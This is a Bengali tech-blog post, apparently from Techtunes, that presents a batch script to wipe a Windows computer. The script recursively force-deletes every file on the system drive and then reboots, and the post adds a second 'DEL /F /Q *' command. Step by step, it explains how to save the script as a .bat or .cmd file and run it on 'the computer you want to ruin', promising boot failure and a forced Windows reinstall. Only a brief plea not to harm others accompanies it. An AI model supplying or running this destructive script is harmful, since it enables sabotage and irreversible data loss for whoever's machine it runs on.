কম্পিউটার এর সকল ফাইল এবং ড্রাইভ ধংস করার জন্য

শিরোনাম দেখে নিশ্চয়ই বুঝেছেন টিউনের বিষয়। কে চায় নিজের পিসি ধংস করতে। কিন্তু আমি আমার পিসির ১২/২৪ টা বাজিয়ে দিয়েছি। এই .bat কোডটি দ্বারা । বিশ্বাস না হলে আপনার পিসির ফাইলগুলো নিরাপদে রেখে একবার ট্রাই করেন। আর পিসির ১২টা বাজার সময় গনেন।

আপনার এই কাজটি করার জন্য যাহা যাহা করতে হবে।
০. আপনার Computer টি নতুন করে ইন্সটল করার জন্য সকল প্রকার প্রস্তটি নিয়ে নিবেন।

১। প্রথমে নিচের কোডটি কে Notepad এ Past করুন। অথবা এখানে থেকে ডাউনলোড করে নিতে পারেন।

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

 

 

 

 

২। ফাইলটি .bat ফর্মেটে যে কোন নামে সেভ করতে পারেন। তবে Save Type টা All files সিলেক্ট রাখবেন।

৩। সেভে করার পর নিচের চিত্রের মত একটি .bat file তৈরি হবে।

৪। এখন যে Computer টা নষ্ট করতে চান সেটাতে রান করান এই .bet ফাইলটি , তারপর ফাইলটির কাণ্ডকিত্তি দেখেন কি করা শুরু করে দিছে।

তবে সাবধান এই ফিলটি যদি ভুলে রান করে ফেলেন টেস্ট করার জন্য, তার আগে আপনার গুরুত্বপূর্ণ ফাইলগুলো অন্য পিসি বা ইউএসবিতে কপি করে নেন। তা না হলে মাথায় হাত দেওয়া ছাড়া আর কোন উপায় থাকবে না।

৫। পিসি নষ্ট করার জন্য ৮-১০ মিনিট লাগতে পারে।

৬। যখন .bat ফাইলটির তাণ্ডব শেষ হবে তখন My Computer গিয়ে দেখন C Drive ব্যতীত অন্য Drive ঊদাও। ওহ C Drive Capacity দেখুন একটু কত আছে। সাথে সাথে দেখুন আপনার পিসি কত স্লো হয়েছে।

৭। এখন আপনার পিসি Restart করে দেখুন আপনার পিসিতে Boot failor দেখা দিচ্ছে , তার মানে ১০০ % আপনাকে নতুন করে Windows Reinstall করতে হবে।

৮। আপনার নষ্ট হওয়া ডাটা উদ্দার করার জন্য আবর্ণক ভাইয়ের Easy Data Recovery Software উপর যে টিউনটা পোস্ট করেছে। তা অনুসরণ করলে আপনার ডাটা পুনরায় ফিরে পেতে পারেন। এই জন্য আপনাকে Without নতুন Partision তৈরি করে উইন্ডোজ দিয়ে আবর্ণক ভাইয়ে টিউনটি অনুসরণ করলেই হবে।

( Computer এর সকল ফাইল অ্যান্ড ফোল্ডার ডিলিট করার জন্য নিচের কোডটি ব্যবহার করতে পারেন:
DEL /F /Q *
নোটপ্যাডে Past করে যে কোন নামে .CMD ফর্মেট সেভে করুন।
তারপর যদি আপনার Computer এর সকল ফাইল/ ফোল্ডার ডিলিট করতে চান, তাহলে পারলে Run করান CMD ফাইলটি।
After Save Run CMD file )

বিঃ দ্রঃ দোয়া করে এই Tricks টি কারও ক্ষতি করার জন্য ব্যবহার করবেন না। Come to learn in techtunes and Go to serve. কারও কোন ফাইল নষ্ট বা হারিয়ে গেলে টিউনার এর দায়িত্ব বহন করবে না।

About বিদ্যুৎ বিশ্বাস

একটি উত্তর দিন